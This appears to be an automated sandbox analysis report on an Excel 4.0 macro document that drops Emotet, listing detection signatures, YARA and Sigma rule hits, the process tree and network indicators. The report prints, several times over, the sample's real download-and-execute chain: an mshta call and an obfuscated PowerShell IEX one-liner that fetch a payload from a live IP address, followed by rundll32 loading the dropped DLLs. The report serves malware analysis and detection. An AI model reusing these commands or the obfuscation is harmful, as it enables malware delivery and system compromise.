Windows Analysis Report
DETAILS-145.xls

Overview

General Information

Sample Name: DETAILS-145.xls
Analysis ID: 562407
MD5: c15231bf03d2cde2f5d16665421d03a1
SHA1: e552fc97c08d64ac0d17c4cebf428665982600ed
SHA256: 107833427623de2638b3514e51ac1241be3911cccc699e8603c7146755356bd9
Tags: SilentBuilder, xls

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1272 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 1188 cmdline: cmd /c mshta http://91.240.118.168/qqw/aas/se.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 2816 cmdline: mshta http://91.240.118.168/qqw/aas/se.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 1516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 152 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 2116 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 200 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2016 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",MOdnuTnMIi MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 836 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 284 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",NSMcfMaGRbKFCL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 1204 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 1136 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",NscZMRYpRiE MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 2080 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                            • rundll32.exe (PID: 1240 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DwOwDiNvSb MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                              • rundll32.exe (PID: 324 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
Source | Rule | Description | Author | Strings
DETAILS-145.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x108a2:$s1: Excel
  • 0x11913:$s1: Excel
  • 0x481d:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
DETAILS-145.xls | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security
DETAILS-145.xls | INDICATOR_OLE_Excel4Macros_DL2 | Detects OLE Excel 4 Macros documents acting as downloaders | ditekSHen
  • 0x47a3:$e2: 00 4D 61 63 72 6F 31 85 00
  • 0x481d:$a1: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A 00
  • 0x946:$x1: * #,##0
  • 0x952:$x1: * #,##0
  • 0x9fb:$x1: * #,##0
  • 0xa0a:$x1: * #,##0
  • 0xa36:$x1: * #,##0

Source | Rule | Description | Author | Strings
C:\Users\user\Desktop\DETAILS-145.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x108a2:$s1: Excel
  • 0x11913:$s1: Excel
  • 0x481d:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
C:\Users\user\Desktop\DETAILS-145.xls | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security
C:\Users\user\Desktop\DETAILS-145.xls | INDICATOR_OLE_Excel4Macros_DL2 | Detects OLE Excel 4 Macros documents acting as downloaders | ditekSHen
  • 0x47a3:$e2: 00 4D 61 63 72 6F 31 85 00
  • 0x481d:$a1: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A 00
  • 0x946:$x1: * #,##0
  • 0x952:$x1: * #,##0
  • 0x9fb:$x1: * #,##0
  • 0xa0a:$x1: * #,##0
  • 0xa36:$x1: * #,##0
C:\ProgramData\QWER.dll | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

Source | Rule | Description | Author | Strings
0000000C.00000002.574709897.0000000000230000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000A.00000002.522412460.00000000028E0000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000C.00000002.574966326.0000000000911000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000A.00000002.521968966.0000000000400000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

Source | Rule | Description | Author | Strings
17.2.rundll32.exe.2a0000.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
17.2.rundll32.exe.2810000.7.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
18.2.rundll32.exe.1d0000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
9.2.rundll32.exe.140000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
15.2.rundll32.exe.2f40000.12.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

System Summary

                            Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2816, TargetFilename: C:\Users\user\AppData\Local
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2816, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit 
$c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1516
                            Source: Process startedAuthor: Florian Roth: Data: Command: mshta http://91.240.118.168/qqw/aas/se.html, CommandLine: mshta http://91.240.118.168/qqw/aas/se.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: cmd /c mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1188, ProcessCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ProcessId: 2816
                            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: cmd /c mshta http://91.240.118.168/qqw/aas/se.html, CommandLine: cmd /c mshta http://91.240.118.168/qqw/aas/se.html, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1272, ProcessCommandLine: cmd /c mshta http://91.240.118.168/qqw/aas/se.html, ProcessId: 1188
                            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2816, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit 
$c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1516
                            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2816, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit 
$c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1516
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2816, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit 
$c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1516

AV Detection

Source: 19.2.rundll32.exe.180000.0.raw.unpack, Malware Configuration Extractor: Emotet
Source: DETAILS-145.xls, ReversingLabs: Detection: 34%
Source: C:\ProgramData\QWER.dll, Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854

                            Software Vulnerabilities

                            barindex
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe
                            Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 91.240.118.168:80
                            Source: global traffic | DNS query: name: kuyporn.com

                            Networking

                            Source: Traffic | Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.168:80
